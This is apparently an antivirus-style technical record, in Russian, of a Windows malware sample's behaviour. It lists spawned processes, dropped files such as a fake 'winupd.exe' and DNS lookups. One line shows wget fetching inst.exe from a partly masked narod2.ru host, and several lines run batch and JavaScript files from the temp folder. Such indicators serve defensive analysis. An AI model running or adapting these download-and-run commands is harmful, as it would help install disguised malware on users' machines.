Техническая информация
- %TEMP%\1.tmp\inst.exe
- %TEMP%\1.tmp\wget.exe http://lu#####cker.narod2.ru/inst.exe
- %WINDIR%\winupd.exe
- %TEMP%\1.tmp\inst.exe (загружен из сети Интернет)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\winupd.bat" "
- <SYSTEM32>\ping.exe ya.ru -n 5
- <SYSTEM32>\taskkill.exe /f /im winupd.exe
- <SYSTEM32>\wscript.exe "%TEMP%\stop.js"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\reg.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7ZSfx000.cmd" "
- %TEMP%\1.tmp\winupd.bat
- %WINDIR%\winupd.exe
- %TEMP%\1.tmp\inst.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\reg.bat
- %TEMP%\stop.js
- %TEMP%\7ZSfx000.cmd
- %TEMP%\winupd.exe
- %WINDIR%\winupd.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\7ZSfx000.cmd
- %TEMP%\stop.js
- %TEMP%\winupd.exe
- 'lu#####cker.narod2.ru':80
- lu#####cker.narod2.ru/inst.exe
- DNS ASK lu#####cker.narod2.ru
- DNS ASK ya.ru
- ClassName: '' WindowName: ''